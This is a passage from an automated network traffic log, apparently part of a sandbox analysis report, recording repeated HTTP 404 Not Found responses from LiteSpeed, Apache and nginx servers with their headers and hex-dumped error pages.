3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 04 Nov 2024 03:17:47 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 04 Nov 2024 03:17:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 04 Nov 2024 03:17:52 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 04 Nov 2024 03:17:55 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:18:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:18:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:18:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 03:18:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 04 Nov 2024 03:18:22 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-04T03:18:27.9031099Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 04 Nov 2024 03:18:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 04 Nov 2024 03:18:33 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not 